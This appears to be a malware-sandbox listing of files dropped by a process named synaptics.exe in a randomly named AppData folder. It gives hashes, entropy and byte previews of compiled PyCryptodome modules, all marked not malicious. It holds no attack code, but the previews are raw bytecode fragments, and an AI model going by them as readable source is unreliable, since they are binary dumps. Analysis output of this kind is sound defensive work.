                                                                                                                                                                                                            Preview:o..........g.........................@...st...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.d.e...Z.d.e.d...Z.G.d.d...d.e...Z.d.S.)......)...IntegerNative.....)...long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..backend..c_size_t..c_ulonglong)...getrandbitsa.....int monty_pow(uint8_t *out,. const uint8_t *base,. const uint8_t *exp,. const uint8_t *modulus,. size_t len,. uint64_t seed);..int monty_multiply(uint8_t *out,. const uint8_t *term1,. const uint8_t *term2,. const uint8_t *modulus,. size_t len);.z.Crypto.Math._modexpZ.custom)...library..apic....................@...s0...e.Z.d.Z.e.d.d.d.....Z.d.d.d...Z.e.d.d.....Z.d.S.)...IntegerCustom..bigc....................C...s8...|.d.k.r.n.|.d.k.r.t.|...}.|.......n.t.d.....t.t.|.....S.).Nr......lit
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20909
                                                                                                                                                                                                            Entropy (8bit):5.3092891497501045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gMZpQnLssSsMoE0lkqR5oMb5W1AC3ISkMleflE3j3GZmCgVHBxVRjhM:gMZWnLRFMZSkqn5s/GWTtVtR1M
                                                                                                                                                                                                            MD5:4C5D3BFC4C257A6D8B3A5BB4FE7393F1
                                                                                                                                                                                                            SHA1:5D1B4882065EDC8D3C4CB05423FF468B7F227AA3
                                                                                                                                                                                                            SHA-256:35DAB3A7CB72529F9EC433CD595706F8CBE53D9910DF80586C3664140EA63EB8
                                                                                                                                                                                                            SHA-512:1E4E28A882EB81A75A8AED955213C9E027678D09F68226006CC1521B3403F61DE383F9E1F4A43E592961443C33C7C8340A38331A1A33330E9DBC45AA39EA813A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.o.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.e.j.d.k.r-e.d.....e.d.e...Z.d.e.d...Z.e.e.d...r@e.d.....G.d.d...d.e...Z.e...Z.e.d...d.k.rnd.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.d...Z.e.e.j._.n.d.d.l.m.Z...d.d...Z.d.e...d.....Z G.d.d...d.e...Z!d.S.)......N)...is_native_int)...backend..load_lib..c_ulong..c_size_t..c_uint8_ptr.....)...IntegerBasea....typedef unsigned long UNIX_ULONG;. typedef struct { int a; int b; void *c; } MPZ;. typedef MPZ mpz_t[1];. typedef UNIX_ULONG mp_bitcnt_t;.. void __gmpz_init (mpz_t x);. void __gmpz_init_set (mpz_t rop, const mpz_t op);. void __gmpz_init_set_ui (mpz_t rop, UNIX_ULONG op);.. UNIX_ULONG __gmpz_get_ui (const mpz_t op);. void __gmpz_set (mpz_t rop, const mpz_t op);. void __gmpz_set_ui (mpz_t rop, UNIX_ULONG op);. void __gmpz_add (mpz_t rop, const mpz_t op1, const mpz_t op2);. void __gmpz_add_ui (mpz_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10714
                                                                                                                                                                                                            Entropy (8bit):4.875639744001051
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:ffdHxwtdzk05NpqTIIsPg96w9MOpdClFUeh/z5p3SCS2gp/cj1GiXB6ITVaw3+3h:fTOdzN5NpqTIIsEVFnG7h/LSCS2i0j1o
                                                                                                                                                                                                            MD5:31133E532FE7E9CE88AEE961D99B59B2
                                                                                                                                                                                                            SHA1:96D708D68119F3629801D998B2492CD7AC5D9C09
                                                                                                                                                                                                            SHA-256:521E6004068694871D4F4565E71BD5B365FBFD2328BDB0E853D150BC6115A5EF
                                                                                                                                                                                                            SHA-512:3950B38A639A48BD364575D06E0CC1288C05E23AE36979CF27855A7D8EDFDC9939BBB62C8E963C20C892C609A2F643552F7A94BC4A95D1B215D9962BE6253B1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s8...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d.S.)......)...IntegerBase.....)...long_to_bytes..bytes_to_long..inverse..GCDc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.did.d...Z.e.djd.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e.Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.dkd/d0..Z.dkd1d2..Z.d3d4..Z.dkd5d6..Z.d7d8..Z.d9d:..Z d;d<..Z!d=d>..Z"d?d@..Z#dAdB..Z$dCdD..Z%dEdF..Z&dGdH..Z'dIdJ..Z(dKdL..Z)dMdN..Z*dOdP..Z+dQdR..Z,dSdT..Z-dUdV..Z.dWdX..Z/dYdZ..Z0d[d\..Z1d]d^..Z2d_d`..Z3dadb..Z4dcdd..Z5e6dedf....Z7e6dgdh....Z8d.S.)l..IntegerNativez3A class to model a natural integer (including zero)c....................C...s<...t.|.t...r.t.d.....z.|.j.|._.W.d.S...t.y.......|.|._.Y.d.S.w.).Nz-A floating point type is not a natural number)...isinstance..float..ValueError.._value..AttributeError)...self..value..r.....WC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Cryp
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                            Entropy (8bit):4.659257385920843
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/zR0llluleh/wZWe05Ot+kiE2J5dj/a6iVWrz4mLOkcTgp:y/6/qeh/wpwkn23h/a/ArMF4
                                                                                                                                                                                                            MD5:D18CBC23899203635C58215A065FDA5B
                                                                                                                                                                                                            SHA1:0A52F5DC60EDF5CEABEE6D1CDC0E21587A013230
                                                                                                                                                                                                            SHA-256:8DAA73A7521AF25608FA6CFBA8D38D0B0FD8AFDE565D66D5600D91D4E1BE5DD3
                                                                                                                                                                                                            SHA-512:BECAE1B8396166422E7BA74E439C992A71C7168BDBD1E8602C6CF9A85EDE380F2EF4419AB97332FF5D7E44D54B4E404A88CBD7B7690BB02DC2ACB1AE04C82602
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Math\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20374
                                                                                                                                                                                                            Entropy (8bit):5.441798189475345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ewGALFMLX4XG+dj/WacI0yhn4HytBQwOTZ8UfXpmJWa7Bbq2PfhOTIOG:edAemj/iI0yh4HytOqUfAJWmbTPA8OG
                                                                                                                                                                                                            MD5:35AA09C8085330393CE28A56B4777175
                                                                                                                                                                                                            SHA1:A4F2E4D32CDCAC77D7EDF4D6792507DAD99E2DB3
                                                                                                                                                                                                            SHA-256:5C2269C32F664156E364294373725138DA819DC7BCC810EE435966A6AFE088F7
                                                                                                                                                                                                            SHA-512:30E79CC0A7D19F88AE962D0D7D1F8A1250E39EA10D75A55E083D12AE57570F80BB3555D1742F58281A3A4A94A07BE60EAD8F993A887D1437EA5163B2701A6157
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gPY.......................@...s$...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z e.d.d...Z!d'd.d...Z"d(d.d...Z#G.d.d...d.e$..Z%d)d.d...Z&d*d.d...Z'd.d...Z(d.d...Z)d.d...Z*d+d d!..Z+d"d#..Z,d,d%d&..Z-d.S.)-.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):218
                                                                                                                                                                                                            Entropy (8bit):5.0786290072264055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/S7pQylud+Z/dZ6+4L5jDwkn23h/a/ArM7BL9+:Cu62uAZ//6+4LZsfsn19+
                                                                                                                                                                                                            MD5:D5370757893EBB0EFBDF370436EB28D3
                                                                                                                                                                                                            SHA1:76B285B52FB4CBDB06C913E84679D7FBBE1D1D0E
                                                                                                                                                                                                            SHA-256:6D1F61AA3223706BCCF8F1CF96B9FD670F86D49BC0D2DF586DAD42600271AB40
                                                                                                                                                                                                            SHA-512:66704690C78895B7D1D13186C46A5D589D91C45739F23834A16435E91E0C04296EA3709AADA281E1D843FD0296A867F1DA83B2FF85FE377E2F67F01BC7DE19D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g1........................@...s....g.d...Z.d.S.).).Z.KDFZ.SecretSharingZ.DHN)...__all__..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Protocol\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23869
                                                                                                                                                                                                            Entropy (8bit):5.54892633756803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kh5ntjDIVVMEPHq5bKA24sW4gEBNZ8CVgwpPjdbRFpCBDCO7G2xel:4t4MES5R2V+Ed3/pPteCO7h4
                                                                                                                                                                                                            MD5:472045C2ACC5C5EA897F5D7E5D3715E5
                                                                                                                                                                                                            SHA1:BF616E581FAD3E0398D74A30DDAD4CF71149B396
                                                                                                                                                                                                            SHA-256:50F6042A7376EFB6FC294BA0170083646B505818BD69D0BF16C3D49401552206
                                                                                                                                                                                                            SHA-512:87DE1EFD451F0B311C598ACA08A2594CAAF0D6619693FE9ACA9E4F4B3FE5C4933BA0B276D0E0E4023AC57181EC5B04B6F0263E6DB44CB1489495CE6BC3A7A010
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.|.......................@...s....g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d#d.d...Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"d%d d!..Z#e#Z$d"Z%d.S.)&)...generate..construct..import_key..RsaKey..oid.....N)...Random)...tobytes..bord..tostr)...DerSequence..DerNull)...bytes_to_long)...Integer)...test_probable_prime..generate_probable_prime..COMPOSITE)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z..6.5dKd7d8..Z.d9d:..Z.d;d<..Z d=d>..Z!d?d@..Z"dAdB..Z#dCdD..Z$dEdF..Z%dGdH..Z&dIdJ..Z'd5S.)Lr....a....Class defining an
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1722
                                                                                                                                                                                                            Entropy (8bit):5.400027951155678
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:wSTw1WWXezNJeV8Kcsso0Gar/xCVf9SVY:Tsk4UrebbsoiSx
                                                                                                                                                                                                            MD5:39E073AEEE6CF7B9257311BA254DA052
                                                                                                                                                                                                            SHA1:8DDEE53F302EA7A33495AE0805DCE3ADC5F29CF9
                                                                                                                                                                                                            SHA-256:BF8A3A4D7A9026CC6AA58777D34AC9DEBA971194D4A63EC4699E811A8042CD80
                                                                                                                                                                                                            SHA-512:E5E81319FC7E994963BCCD491A3EB75686D611DB79CB7E15830E01F78E8A268322BEBDC26AB9E7CD9546C5CC2242B4EEAF0415158D31157AA1A500B3197FC6A1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s8...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.d...Z.d.d...Z.d.S.)......)...DerSequence..DerInteger..DerBitString..DerObjectId..DerNullc....................C...s....t...j.|.d.d...}.t...j.|.d...d.d...}.t.....|.d.....}.t.....|.d.....j.}.t.|...d.k.r,d.}.n.z.t.....|.d.......d.}.W.n.......|.d...}.Y.|.j.|.|.f.S.).z.Parse a SubjectPublicKeyInfo structure... It returns a triple with:. * OID (string). * encoded public key (bytes). * Algorithm parameters (bytes or None). .......Z.nr_elementsr....)......r....r....N).r......decoder....r......value..lenr....)...encoded..spkiZ.algo..algo_oidZ.spkZ.algo_params..r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\PublicKey\__init__.py.._expand_subject_public_key_info....s............................r....c....................C...s@...|.d.u.r.t.t.|...g...}.n.t.t.|...|.g...}.t.|.t.|...g...}.|.....S.).N).r....r....r......encode).r....Z.public_key..params..algorithmr....r..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1270
                                                                                                                                                                                                            Entropy (8bit):4.675463227543499
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:AFtWRuX2i3FOd3kr5fKInkOCUqxUNRQj/jfhlHJ4fEByWkJwjGP4gE/:dRHd0VKUEU9iDrtP6Af
                                                                                                                                                                                                            MD5:8D4895A7BD57B9077C786C069C386EB2
                                                                                                                                                                                                            SHA1:5CC9385E27F0433E66DCC8CC7D46B2EC00F83207
                                                                                                                                                                                                            SHA-256:A944D214974595AC088A827A795E15EB26B35B257B0489A35D90C8411CB28CC9
                                                                                                                                                                                                            SHA-512:E61CCCE04170333DE826427E4CD5A59C076544E96F86FA3A8D510C46BE9287BA886704715FFBCAE1A794551C87302C1243048987B8C47138E90870CD9ED287D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gJ........................@...s<...d.d.g.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.d...Z.e.Z.d.S.)...new..get_random_bytes.........urandomc....................@...s,...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._UrandomRNGc....................C...s....t.|...S.).z0Return a random byte string of the desired size.r....)...self..n..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Random\__init__.py..read....s......z._UrandomRNG.readc....................C........d.S...z0Method provided for backward compatibility only.Nr......r....r....r....r......flush!..........z._UrandomRNG.flushc....................C...r....r....r....r....r....r....r......reinit%...r....z._UrandomRNG.reinitc....................C...r....r....r....r....r....r....r......close)...r....z._UrandomRNG.closeN)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r....r........s..............r....c....................O...s....t...S.).zFReturn a file-like object that outputs c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3407
                                                                                                                                                                                                            Entropy (8bit):5.312816352071411
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mk/Yq7xkJ5PPcWgudGUJFp9YY3sjuhXNvLHf85jL:MWW5PP7gO8Y31hdvLH6
                                                                                                                                                                                                            MD5:B05886A649DD3E3ADF7EBC9ADAC8E866
                                                                                                                                                                                                            SHA1:22FA6B1CCFE81082F64F9EA11D78C21231A1171B
                                                                                                                                                                                                            SHA-256:1936A08CC7C889592D388780E882332B4CD633DBB8A0B41058849971FA8BBF2C
                                                                                                                                                                                                            SHA-512:329504BCE045663A969B1112760ACF17645D64A52CB3D783E93CDF7881AABB0CDB8583227177A8F9EB6A4603E0593733BF946E11E820765051CBD42AA7166189
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sv...g.d...Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.S.).)...StrongRandom..getrandbits..randrange..randint..choice..shuffle..sample.....)...Random)...is_native_intc....................@...sF...e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...sX...|.d.u.r.|.d.u.r.d.|._.d.S.|.d.u.r.|.d.u.r.|.|._.d.S.|.d.u.r(|.d.u.r(|.j.|._.d.S.t.d.....).Nz(Cannot specify both 'rng' and 'randfunc')..._randfunc..read..ValueError)...self..rng..randfunc..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Random\random.py..__init__ ...s..................z.StrongRandom.__init__c....................C...s:...|.j.d.u.r.t.....j.|._.d.|.>.d...}.|.t.|...t.|.d.......@.S.).z%Return an integer with k random bits.N..........).r....r......newr......bytes_to_long..ceil_div).r......k..maskr....r....r....r....*...s............z.StrongRandom.ge
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):363
                                                                                                                                                                                                            Entropy (8bit):5.3334200124860125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/u31/WlJnIsICA51dJyikQSKCUICAfeT37ZgAk+h+uwkn23h/a/ArMgA5762:Cu39WllIVF1mikQ4NSDQ+QfsnD762
                                                                                                                                                                                                            MD5:F2D6097886C081EBB51B14872E48475D
                                                                                                                                                                                                            SHA1:222DD87DCBE7B205D578DA76C587A1136C33F143
                                                                                                                                                                                                            SHA-256:AFDD8BD3E2902EA10FAB2E842B6C524D4F7580CF19EFF9D7E02DEDB9EACEE700
                                                                                                                                                                                                            SHA-512:3B89FD225CC891A35A4C43A7A1F959E9BAE5E541268BF3AB51105FDD0EEEF7C7BE569D4F551BFD9A8316A97D30CDFCB5301095EA2A5C23D3EB4143C82AFD47EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.g.d...Z.d.S.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..).Z.PKCS1_v1_5Z.PKCS1_PSSZ.DSSZ.pkcs1_15Z.pssZ.eddsaN)...__doc__..__all__..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Signature\__init__.py..<module>....s........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10811
                                                                                                                                                                                                            Entropy (8bit):5.326228510065543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:A1XSDu4taLRgOBEsNXAYcURRFNlm32KFO6GaVRlpBlYa:A1CCI+RgslADURRV/KPGaVZBea
                                                                                                                                                                                                            MD5:78B74A98487D3E103B3C28B8824FCBE4
                                                                                                                                                                                                            SHA1:BC9A6275D63214D8252B98F3164547F07C67D5F4
                                                                                                                                                                                                            SHA-256:33B87D2D6F7CCD80DB5CA31700E277EE38AD835351BB7073A834C77EF0868647
                                                                                                                                                                                                            SHA-512:8C7E297047BD08CABBAA1ADC52797DEA0E0B406760844FF41465511AD89D08360A92B7F0D54031E4474EFD38EC468400EA5D29D476D1B12E5A568BDF68BA48FD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.6.......................@...sz...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c....................C...s....|.|._.|.|._.|.|._.|.|._.d.S.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to. genera
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2347
                                                                                                                                                                                                            Entropy (8bit):5.445720475109234
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:tbQJrnAeKJdRXlkNHKiFsx3miW7WlxeKbNRT7ytqmcQg:tbQJDAeqzlo2W6re637wg
                                                                                                                                                                                                            MD5:FEE92B9111FF738AC24640248E4A49D0
                                                                                                                                                                                                            SHA1:11CF0895F13198E5F8D7852164E09FCCD8F7B892
                                                                                                                                                                                                            SHA-256:4EB984C359859BD0A72F8425A5186158EB9CEE3C5848EC88EC1B9CB59D9D4571
                                                                                                                                                                                                            SHA-512:6354AE53E7CB9EB7A31A65D54E2098329CD7BFC14FC6EB0BFD1536594A9B68FB75FCA1308A7A0940686C8E6A867CB46752D55F8FF527BD617B3990A3C4D4CF2B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gE........................@...s(...d.d.g.Z.d.d.l.T.d.d.d...Z.d.d.d...Z.d.S.)...pad..unpad.....)...*..pkcs7c....................C...s....|.t.|...|.....}.|.d.k.r.t.|...|...}.|.|...S.|.d.k.r*t.d...|.d.....t.|.....}.|.|...S.|.d.k.r>t.d...t.d...|.d.......}.|.|...S.t.d.....).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. r......x923r...........iso7816......Unknown padding style)...len..bchr..ValueError).Z.data_to_pad..block_size..style..padding_len..padding..r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\Padding.pyr....'...s....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1118
                                                                                                                                                                                                            Entropy (8bit):4.88832542954934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ullUilE4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBltfK2/K:uliilbASgf++BcD4YaQVprGGBXKR
                                                                                                                                                                                                            MD5:84CF8A90A7E353EC433E4B37DCDE2CB6
                                                                                                                                                                                                            SHA1:EB40A7C6CA8A8A1B9A8A25C410DB193BCDBC95CC
                                                                                                                                                                                                            SHA-256:14C37D0894F3ED986FCC605EF87BD8C9B2C8A85DBE227CAC387C3D15D6A86E2F
                                                                                                                                                                                                            SHA-512:DB0605916D2CE7F7AF7A95ED1F2AD1CAAC12CE9E4AEAD66B31967B2C0A6CF714229E7C8E341723FFD7EECDB0568593871126B354ED3C3FA0272FFE51B13850FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.).Z.RFC1751..numberZ.strxorZ.asn1..CounterZ.PaddingN)...__doc__..__all__
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):705
                                                                                                                                                                                                            Entropy (8bit):4.629902932138858
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CHcVQ4UlabXgAin19S07ovfsn2mv99J+di+ymIm+l:a+UliQAin19SkyfK2+J+dBIL
                                                                                                                                                                                                            MD5:222618931B6CD331CAA4803871238AD0
                                                                                                                                                                                                            SHA1:501BF26FF05488C03727384C862406C0E9F5875C
                                                                                                                                                                                                            SHA-256:1DF0F62B9E6D3599CDFF953A4C505EAFED3D8B6E3622551C22BF1F14C39ADAFE
                                                                                                                                                                                                            SHA-512:8B2BE112D67CF033AABF03AB55C601CFC82A70CB0E02AE73276ED9F1C3A1F4D7A0FBE537BF8E3CC6AAFDCA3AA1A7EDFCBAB59CE8B37884D1291E9F89A697C93F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s*...d.d.l.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c....................C........t.....S...N)..._raw_cpuid_lib..have_aes_ni..r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Util\_cpu_features.pyr....)..........r....c....................C...r....r....).r......have_clmulr....r....r....r....r....-...r....r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r....r......<module>....s................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):864
                                                                                                                                                                                                            Entropy (8bit):5.3394196582324405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:fLuapeA2HBZ8SlwC8ES3OyHzwZsfK28M/3k:fLu4YZkCkeyHzwiK8/0
                                                                                                                                                                                                            MD5:08088EFB5BAE1C523B42D44DAA18CC20
                                                                                                                                                                                                            SHA1:3BAF27F20DD8BC423364A969D03CF841FF69CFA6
                                                                                                                                                                                                            SHA-256:BDCCA456046FED0C98C7FA3B48DE05769EC6623D7C18451B8DE54FE70AB9E2F3
